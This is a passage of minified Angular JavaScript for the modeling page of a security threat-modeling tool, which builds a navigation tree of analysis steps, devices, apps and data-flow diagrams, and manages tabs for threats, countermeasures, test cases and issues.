be(e),Me(B(2).currentTestCaseCount=n)}),u(),s(5,"\n                "),u()}if(2&t){const e=B(2);C(4),V("isActive",2==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}function DSe(t,a){if(1&t&&(s(0,"\n                    "),m(1,"span",53),s(2),oe(3,"translate"),u(),s(4,"\n                  ")),2&t){const e=B(2);C(1),V("matBadge",e.currentIssueCount)("matBadgeHidden",0==e.currentIssueCount),C(1),ke(re(3,3,"general.Issues"))}}function xSe(t,a){if(1&t){const e=Ye();m(0,"as-split-area",7),s(1,"\n              "),m(2,"mat-tab-group",48),he("selectedIndexChange",function(n){return be(e),Me(B().selectedBottomTabGroupIndex=n)}),s(3,"\n                "),m(4,"mat-tab"),s(5,"\n                  "),ne(6,vSe,5,5,"ng-template",49),s(7,"\n                  "),m(8,"app-threat-table",50),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("threatCountChanged",function(n){return be(e),Me(B().currentThreatCount=n)}),u(),s(9,"\n                "),u(),s(10,"\n                "),m(11,"mat-tab"),s(12,"\n                  "),ne(13,ASe,5,5,"ng-template",49),s(14,"\n                  "),m(15,"app-countermeasure-table",51),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("countermeasureCountChanged",function(n){return be(e),Me(B().currentCountermeasureCount=n)}),u(),s(16,"\n                "),u(),s(17,"\n                "),ne(18,ESe,6,4,"mat-tab",10),s(19,"\n                "),m(20,"mat-tab"),s(21,"\n                  "),ne(22,DSe,5,5,"ng-template",49),s(23,"\n                  "),m(24,"app-issue-table",52),he("selectedObjectChanged",function(n){return be(e),Me(B().selectedObject=n)})("issueCountChanged",function(n){return be(e),Me(B().currentIssueCount=n)}),u(),s(25,"\n                "),u(),s(26,"\n              "),u(),s(27,"\n            "),u()}if(2&t){const e=B();V("size",e.GetSplitSize(2,1,30))("order",2),C(8),V("isActive",0==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),C(7),V("isActive",1==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject),C(3),V("ngIf",e.dataService.Project.HasTesting),C(6),V("isActive",3==e.selectedBottomTabGroupIndex)("selectedNode",e.selectedNode)("selectedObject",e.selectedObject)("filteredObject",e.filteredObject)}}var aa=(()=>{return(t=aa||(aa={})).CharScope="char-scope",t.ObjImpact="obj-impact",t.Context="context",t.UseCase="use-case",t.Assets="asset",t.ThreatSources="threat-sources",t.SystemThreats="system-threats",t.Hardware="hardware",t.Software="software",t.Process="process",t.Dataflow="dataflow",t.Checklist="checklist",aa;var t})();let zG=(()=>{class t extends CT{constructor(e,i,n,r,c,d,T){super(),this.theme=e,this.dataService=i,this.router=n,this.route=r,this.locStorage=c,this.dialog=d,this.translate=T,this._selectedTabIndex=0,this.tabs=[],this.hasBottomTabGroup=!0,this.selectedBottomTabGroupIndex=0,this.currentThreatCount=0,this.currentCountermeasureCount=0,this.currentTestCaseCount=0,this.currentIssueCount=0,this.dataService.Project||this.router.navigate(["/"]),this.router.events.subscribe(k=>{k instanceof Ph&&this.route.queryParams.subscribe(q=>{const Y=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>Fe.dataType==pe);Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})},te=pe=>{const Re=xa.FlattenNodes(this.nodes).find(Fe=>{var Ne;return(null===(Ne=Fe.data)||void 0===Ne?void 0:Ne.ID)==pe});Re&&this.newTab(Re),this.router.navigate([],{replaceUrl:!0,relativeTo:this.route})};if(null!=q.tab&&(this.nodes?Y(q.tab):setTimeout(()=>{this.nodes&&Y(q.tab)},500)),null!=q.viewID&&(this.nodes?te(q.viewID):setTimeout(()=>{this.nodes&&te(q.viewID)},500)),null!=q.elementID){let pe=this.dataService.Project.GetDFDElement(q.elementID);pe||(pe=this.dataService.Project.GetComponent(q.elementID)),pe||(pe=this.dataService.Project.GetContextElement(q.elementID)),pe&&setTimeout(()=>{this.selectedObject=pe},100)}})}),this.dataService.ProjectChanged.subscribe(k=>{k&&setTimeout(()=>{this.tabs.forEach(q=>this.RemoveTab(q)),this.createNodes()},10)})}get selectedNode(){var e;return(this.selectedTabIndex<0&&this.tabs.length>0||this.selectedTabIndex>=this.tabs.length&&this.tabs.length>0)&&(console.error("Tab index out of array"),console.log(this.selectedTabIndex,this.tabs.length)),null===(e=this.tabs[this.selectedTabIndex])||void 0===e?void 0:e.nav}set selectedNode(e){setTimeout(()=>{this.hasBottomTabGroup=!e||[aa.Context,aa.UseCase,aa.Hardware,aa.Software,aa.Process,aa.Dataflow].includes(e.dataType),e&&this.newTab(e)},10)}get selectedTabIndex(){return this._selectedTabIndex<0&&this.tabs.length>0&&(this._selectedTabIndex=0),this._selectedTabIndex}set selectedTabIndex(e){this._selectedTabIndex=e,setTimeout(()=>{this.elementView&&this.elementView.RefreshTree()},100)}get selectedObject(){return this._selectedObject}set selectedObject(e){this._selectedObject=e}get filteredObject(){return this._filteredObject}set filteredObject(e){this._filteredObject=e}get selectedComponent(){return this.selectedObject instanceof rf?this.selectedObject:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}RemoveTab(e){const i=this.tabs.indexOf(e);if(i>-1){let n=this.tabs.indexOf(e)==this.selectedTabIndex;this.tabs.splice(i,1),n?this.OnTabIndexChange(i>0?i-1:0):i<this.selectedTabIndex&&(this.selectedTabIndex=this.selectedTabIndex-1)}}OnTabIndexChange(e){if(e==this.selectedTabIndex)return;let i=this.selectedTabIndex;this.selectedTabIndex=e,this.selectedObject=null,this.filteredObject=null,this.tabs.length>i&&this.tabs[i]&&!this.tabs[i].keepOpen&&setTimeout(()=>{this.RemoveTab(this.tabs[i]),i<this.selectedTabIndex&&(this.selectedTabIndex=this.selectedTabIndex-1)},500)}OnNodeDoubleClicked(e){let i=this.tabs.find(n=>n.nav==e);i&&(i.keepOpen=!0)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MODELING_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MODELING_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}OnOpenDiagram(e){let i=xa.FindNodeOfObject(e.diagram,this.nodes);i||(this.createNodes(),i=xa.FindNodeOfObject(e.diagram,this.nodes)),i&&this.newTab(i),e.element&&setTimeout(()=>{this.selectedObject=e.element},1e3)}IsCharScope(e){return(null==e?void 0:e.data)instanceof dM}IsObjImpact(e){return(null==e?void 0:e.data)instanceof mM}IsThreatSource(e){return(null==e?void 0:e.data)instanceof uM}IsThreatIdentification(e){return(null==e?void 0:e.dataType)==aa.SystemThreats}IsAssetGroup(e){return(null==e?void 0:e.data)instanceof Zl}IsDiagram(e){return(null==e?void 0:e.data)instanceof as}IsMyComponentStack(e){return(null==e?void 0:e.data)instanceof Om}IsChecklist(e){return(null==e?void 0:e.data)instanceof CM}IsModelInfo(e){return(null==e?void 0:e.data)instanceof uf}IsTesting(e){return(null==e?void 0:e.data)instanceof fM}GetContainer(e){var i;if(e){if(this.isContainer(e.data))return e.data;if(this.isContainer(null===(i=e.data)||void 0===i?void 0:i.Elements))return e.data.Elements}}IsContainer(e){return null!=this.GetContainer(e)}isContainer(e){return e&&e.GetChildren&&"function"==typeof e.GetChildren}newTab(e){var i;let n=this.tabs.find(r=>{var c,d;return(null===(c=r.nav.data)||void 0===c?void 0:c.ID)==(null===(d=e.data)||void 0===d?void 0:d.ID)});if(n)this.OnTabIndexChange(this.tabs.indexOf(n));else{let r=null===(i=this.findParent(e,this.nodes))||void 0===i?void 0:i.name();r||(r=this.dataService.Project.Name),this.tabs.push({label:r,keepOpen:!1,nav:e}),setTimeout(()=>{this.OnTabIndexChange(this.tabs.length-1)},100)}}findParent(e,i){for(let n=0;n<i.length;n++)if(i[n].children&&i[n].children.includes(e))return i[n];for(let n=0;n<i.length;n++)if(i[n].children){let r=this.findParent(e,i[n].children);if(r)return r}return null}createNodes(){var e,i,n;const r=null===(e=this.selectedNode)||void 0===e?void 0:e.data,c=this.nodes;this.nodes=[];const d=this.dataService.Project,T=Ze=>{let yt={name:()=>Ze.Name,icon:"fact_check",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Checklist,canRename:!0,onRename:It=>{Ze.Name=It},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(It=>{if(It){this.dataService.Project.DeleteChecklist(Ze),this.selectedNode==yt&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}};return yt},k=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:Nt=>{Ze.Name=Nt},canAdd:!0,addOptions:[],onAdd:Nt=>{if("Assets"==Nt){let oi=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=oi.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Software"==Nt){let oi=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else if("Process"==Nt){let oi=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(oi,this.nodes)}else{let oi=this.dataService.Config.GetChecklistTypes().find(Ai=>Ai.Name==Nt.replace(this.translate.instant("general.Checklist")+": ",""));if(oi){let Ai=this.dataService.Project.CreateChecklist(Ze,oi);this.createNodes();const vi=xa.FindNodeOfObject(Ai,this.nodes);this.selectedNode=vi,vi.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(Nt=>{if(Nt){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let oi=this.tabs.find(Ai=>{var vi;return(null===(vi=Ai.nav.data)||void 0===vi?void 0:vi.ID)==Ze.ID});oi&&this.RemoveTab(oi),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(0!=Ai){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai-1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai-1,1)[0])}},onMoveDown:()=>{let Nt=this.dataService.Project.GetContextElements(),oi=yt.children.map(vi=>vi.data),Ai=oi.findIndex(vi=>vi.ID==Ze.ID);if(Ai!=oi.length-1){let vi=Nt.findIndex(xi=>xi.ID==oi[Ai+1].ID);this.dataService.Project.MoveItemInContextElements(Nt.findIndex(xi=>xi.ID==Ze.ID),vi),yt.children.splice(Ai,0,yt.children.splice(Ai+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let oi=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);this.dataService.Project.DeleteAssetGroup(oi),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Assets"),It.children.push({name:()=>"Hardware",icon:"developer_board",iconAlignLeft:!0,canSelect:!0,data:Ze.HardwareDiagram,dataType:aa.Hardware,canRename:!1,canDelete:!1,canDuplicate:!1}),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let oi=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(oi).subscribe(Ai=>{if(Ai){let vi=xa.FindNodeOfObject(oi,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==vi&&(this.selectedNode=null);let xi=this.tabs.find(Za=>Za.nav.data.ID==oi.ID);xi&&this.RemoveTab(xi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(Nt=>this.translate.instant("general.Checklist")+": "+Nt.Name)),Ze.Checklists.forEach(Nt=>It.children.push(T(Nt))),It},q=(Ze,yt)=>{let It={name:()=>Ze.Name,canSelect:!1,data:Ze,canRename:!0,onRename:St=>{Ze.Name=St},canAdd:!0,addOptions:[],onAdd:St=>{if("Assets"==St){let Nt=d.InitializeNewAssetGroup(d.Config);Ze.Data.assetGroupID=Nt.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Software"==St){let Nt=Ze.CreateSoftwareStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else if("Process"==St){let Nt=Ze.CreateProcessStack();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Nt,this.nodes)}else{let Nt=this.dataService.Config.GetChecklistTypes().find(oi=>oi.Name==St.replace("Checklist: ",""));if(Nt){let oi=this.dataService.Project.CreateChecklist(Ze,Nt);this.createNodes();const Ai=xa.FindNodeOfObject(oi,this.nodes);this.selectedNode=Ai,Ai.isRenaming=!0}}},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteContextElement(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>{var Ai;return(null===(Ai=oi.nav.data)||void 0===Ai?void 0:Ai.ID)==Ze.ID});Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetContextElements(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);this.dataService.Project.MoveItemInContextElements(St.findIndex(vi=>vi.ID==Ze.ID),Ai),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}},children:[]};return Ze.AssetGroup?It.children.push({name:()=>"Assets",icon:Zl.Icon,iconAlignLeft:!0,canSelect:!0,data:Ze.AssetGroup,dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Nt=Ze.AssetGroup;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);this.dataService.Project.DeleteAssetGroup(Nt),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Assets"),Ze.SoftwareStack?It.children.push({name:()=>"Software",icon:"code",iconAlignLeft:!0,canSelect:!0,data:Ze.SoftwareStack,dataType:aa.Software,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.SoftwareStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteSoftwareStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Software"),Ze.ProcessStack?It.children.push({name:()=>"Process",icon:"policy",iconAlignLeft:!0,canSelect:!0,data:Ze.ProcessStack,dataType:aa.Process,canRename:!1,canDelete:!0,onDelete:()=>{let Nt=Ze.ProcessStack;this.dialog.OpenDeleteObjectDialog(Nt).subscribe(oi=>{if(oi){let Ai=xa.FindNodeOfObject(Nt,this.nodes);Ze.DeleteProcessStack(),this.selectedNode==Ai&&(this.selectedNode=null);let vi=this.tabs.find(xi=>xi.nav.data.ID==Nt.ID);vi&&this.RemoveTab(vi),this.createNodes()}})}}):It.addOptions.push("Process"),It.addOptions.push(...this.dataService.Config.GetChecklistTypes().map(St=>"Checklist: "+St.Name)),Ze.Checklists.forEach(St=>It.children.push(T(St))),It},Y=(Ze,yt)=>{let It={name:()=>Ze.Name,icon:"account_tree",iconAlignLeft:!0,canSelect:!0,data:Ze,dataType:aa.Dataflow,canRename:!0,onRename:St=>{Ze.Name=St},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Ze).subscribe(St=>{if(St){this.dataService.Project.DeleteDiagram(Ze),this.selectedNode==It&&(this.selectedNode=null);let Nt=this.tabs.find(oi=>oi.nav.data.ID==Ze.ID);Nt&&this.RemoveTab(Nt),this.createNodes()}})},canDuplicate:!1,canMoveUpDown:!0,onMoveUp:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(0!=oi){let Ai=St.findIndex(vi=>vi.ID==Nt[oi-1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi-1,1)[0])}},onMoveDown:()=>{let St=this.dataService.Project.GetDiagrams(),Nt=yt.children.map(Ai=>Ai.data),oi=Nt.findIndex(Ai=>Ai.ID==Ze.ID);if(oi!=Nt.length-1){let Ai=St.findIndex(vi=>vi.ID==Nt[oi+1].ID);St.splice(Ai,0,St.splice(St.findIndex(vi=>vi.ID==Ze.ID),1)[0]),yt.children.splice(oi,0,yt.children.splice(oi+1,1)[0])}}};return It},te={name:()=>this.translate.instant("dialog.modelinfo.title"),icon:"source",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project},pe={name:()=>this.translate.instant("pages.modeling.analysis"),icon:"create",iconAlignLeft:!1,canSelect:!1,children:[{name:()=>"Characterization & Scope",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"edit_note",data:d.GetCharScope(),dataType:aa.CharScope},{name:()=>"Business Objectives & Impact",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"outlined_flag",data:d.GetObjImpact(),dataType:aa.ObjImpact},{name:()=>"System Interaction",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"signpost",data:null===(i=d.GetSysContext())||void 0===i?void 0:i.ContextDiagram,dataType:aa.Context},{name:()=>"Use Cases",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"explore",data:null===(n=d.GetSysContext())||void 0===n?void 0:n.UseCaseDiagram,dataType:aa.UseCase},{name:()=>"Assets",nameExtension:"(opt*)",tooltipExtension:this.translate.instant("pages.modeling.optionalAsset"),canSelect:!0,iconAlignLeft:!0,icon:Zl.Icon,data:d.GetProjectAssetGroup(),dataType:aa.Assets,canDelete:!0,onDelete:()=>{let Ze=d.GetProjectAssetGroup();this.dialog.OpenDeleteObjectDialog(Ze).subscribe(yt=>{if(yt){let It=xa.FindNodeOfObject(Ze,this.nodes);this.dataService.Project.DeleteAssetGroup(Ze),this.selectedNode==It&&(this.selectedNode=null);let St=this.tabs.find(Nt=>Nt.nav.data.ID==Ze.ID);St&&this.RemoveTab(St),this.createNodes()}})}},{name:()=>"Threat Sources",nameExtension:"(opt)",tooltipExtension:this.translate.instant("pages.modeling.optionalStep"),canSelect:!0,iconAlignLeft:!0,icon:"portrait",data:d.GetThreatSources(),dataType:aa.ThreatSources},{name:()=>"Threat Identification",canSelect:!0,iconAlignLeft:!0,icon:"flash_on",dataType:aa.SystemThreats}]},Re=pe.children.findIndex(Ze=>Ze.dataType==aa.Assets);null==pe.children[Re].data&&(pe.children.splice(Re,1),pe.canAdd=!0,pe.addOptions=["Assets"],pe.onAdd=()=>{let Ze=d.InitializeNewAssetGroup(d.Config);d.Data.projectAssetGroupId=Ze.ID,this.createNodes(),this.selectedNode=xa.FindNodeOfObject(Ze,this.nodes)});const Fe={name:()=>this.translate.instant("pages.modeling.devices"),icon:Ou.Icon,iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateDevice(),this.createNodes()},children:[]},Ne={name:()=>this.translate.instant("pages.modeling.apps"),icon:cf.Icon,iconAlignLeft:!1,canSelect:!1,isExpanded:!1,canAdd:!0,onAdd:()=>{this.dataService.Project.CreateMobileApp(),this.createNodes()},children:[]},et={name:()=>this.translate.instant("pages.modeling.useCaseDFDs"),icon:"account_tree",iconAlignLeft:!1,canSelect:!1,canAdd:!0,onAdd:()=>{let Ze=this.dataService.Project.CreateDiagram(xn.DataFlow);this.createNodes();const yt=xa.FindNodeOfObject(Ze,this.nodes);this.selectedNode=yt,yt.isRenaming=!0},children:[]},ut={name:()=>this.translate.instant("general.TestCases"),icon:"checklist",iconAlignLeft:!1,canSelect:!0,data:this.dataService.Project.GetTesting()};d.GetDevices().forEach(Ze=>Fe.children.push(k(Ze,Fe))),d.GetMobileApps().forEach(Ze=>Ne.children.push(q(Ze,Ne))),d.GetDFDiagrams().forEach(Ze=>et.children.push(Y(Ze,et))),this.nodes.push(te),this.nodes.push(pe),this.nodes.push(Fe),this.nodes.push(Ne),this.nodes.push(et),ut.data&&this.nodes.push(ut),xa.TransferExpandedState(c,this.nodes),this.navTree&&this.navTree.SetNavTreeData(this.nodes,r)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Oo),Ee(El),Ee(_r),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-modeling"]],viewQuery:function(e,i){if(1&e&&(Mi(sSe,5),Mi(gT,5)),2&e){let n;Vt(n=Bt())&&(i.elementView=n.first),Vt(n=Bt())&&(i.compStack=n.first)}},features:[ci],decls:68,vars:57,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/modeling",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],["direction","vertical",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],[3,"activeNode","selectedNodeChanged","nodeDoubleClicked"],["navTree",""],[4,"ngIf"],["preserveContent","",1,"topTabGroup",2,"height","100%",3,"selectedIndex","selectedIndexChange"],["style","width: 100%; height: 100%;","class","tab-content",4,"ngFor","ngForOf"],[3,"size","order",4,"ngIf"],[3,"selectedNode"],[3,"dataObject","selectedObject","selectedObjectChanged","openQuestionnaire"],[3,"elements","selectedElement","filteredElement","selectionChanged","filterChanged"],["elementview",""],[1,"tab-content",2,"width","100%","height","100%"],["mat-tab-label","","style","width: 100%;"],["matTabContent",""],[3,"mouseenter","mouseleave","dblclick"],["rowspan","2",2,"width","24px","vertical-align","middle"],[1,"tab-icon"],[2,"vertical-align","middle"],["mat-icon-button","",3,"click"],[2,"font-size","small"],["style","height: 100%; margin: 10px;",3,"refreshNodes",4,"ngIf"],["style","height: 100%;",3,"charScope",4,"ngIf"],["style","height: 100%;",3,"objImpact",4,"ngIf"],["style","height: 100%;",3,"threatSources",4,"ngIf"],["style","height: 100%;",4,"ngIf"],["style","height: 100%;",3,"assetGroup","selectedObject","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged",4,"ngIf"],["style","height: 100%;",3,"stack","selectedComponent","selectionChanged",4,"ngIf"],["style","height: 100%;",3,"checklist",4,"ngIf"],["style","height: 100%;",3,"testing",4,"ngIf"],[2,"height","100%","margin","10px",3,"refreshNodes"],[2,"height","100%",3,"charScope"],[2,"height","100%",3,"objImpact"],[2,"height","100%",3,"threatSources"],[2,"height","100%"],[2,"height","100%",3,"assetGroup","selectedObject","selectionChanged"],[2,"height","100%",3,"selectedNode","diagram","selectedElement","selectionChanged","navTreeChanged"],[2,"height","100%",3,"stack","selectedComponent","selectionChanged"],["compStack",""],[2,"height","100%",3,"checklist"],[2,"height","100%",3,"testing"],[1,"bottomTabGroup",3,"selectedIndexChange"],["mat-tab-label",""],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","threatCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","countermeasureCountChanged"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","issueCountChanged"],["matBadgeSize","small","matBadgePosition","below","matBadgeOverlap","false",3,"matBadge","matBadgeHidden"],[3,"isActive","selectedNode","selectedObject","filteredObject","selectedObjectChanged","testCaseCountChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,3)}),s(16,"\n            "),m(17,"as-split-area",7),s(18,"\n              "),m(19,"app-nav-tree",8,9),he("selectedNodeChanged",function(r){return i.selectedNode=r})("nodeDoubleClicked",function(r){return i.OnNodeDoubleClicked(r)}),u(),s(21,"\n            "),u(),s(22,"\n            "),m(23,"as-split-area",7),s(24,"\n              "),ne(25,cSe,5,3,"ng-container",10),s(26,"\n            "),u(),s(27,"\n          "),u(),s(28,"\n        "),u(),s(29,"\n        "),m(30,"as-split-area",7),s(31,"\n          "),m(32,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,2)}),s(33,"\n            "),m(34,"as-split-area",7),s(35,"\n              "),m(36,"mat-tab-group",11),he("selectedIndexChange",function(r){return i.OnTabIndexChange(r)}),s(37,"\n                "),ne(38,MSe,6,0,"mat-tab",12),s(39,"\n              "),u(),s(40,"\n            "),u(),s(41,"\n            "),ne(42,xSe,28,15,"as-split-area",13),s(43,"\n          "),u(),s(44,"\n        "),u(),s(45,"\n        "),m(46,"as-split-area",7),s(47,"\n          "),m(48,"as-split",6),he("dragEnd",function(r){return i.OnSplitSizeChange(r,4)}),s(49,"\n            "),m(50,"as-split-area",7),s(51,"\n              "),it(52,"app-stencil-palette",14),s(53,"\n            "),u(),s(54,"\n            "),m(55,"as-split-area",7),s(56,"\n              "),m(57,"app-properties",15),he("selectedObjectChanged",function(r){return i.selectedObject=r})("openQuestionnaire",function(r){return i.compStack.OnComponentDblClick(r)}),u(),s(58,"\n            "),u(),s(59,"\n          "),u(),s(60,"\n        "),u(),s(61,"\n      "),u(),s(62,"\n    "),u(),s(63,"\n  "),u(),s(64,"\n  "),it(65,"app-status-bar"),s(66,"\n"),u(),s(67,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(3,0,60))("order",1),C(2),V("activeNode",i.selectedNode),C(4),V("size",i.GetSplitSize(3,1,40))("order",2),C(2),V("ngIf",i.IsContainer(i.selectedNode)),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(2),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(2,0,70))("order",1),C(2),V("selectedIndex",i.selectedTabIndex),C(2),V("ngForOf",i.tabs),C(4),V("ngIf",i.hasBottomTabGroup),C(4),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,2,310))("order",3),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("gutterSize",3)("restrictMove",!0),C(2),V("size",i.GetSplitSize(4,0,60))("order",1),C(2),V("selectedNode",i.selectedNode),C(3),V("size",i.GetSplitSize(4,1,40))("order",2),C(2),V("dataObject",null==i.selectedNode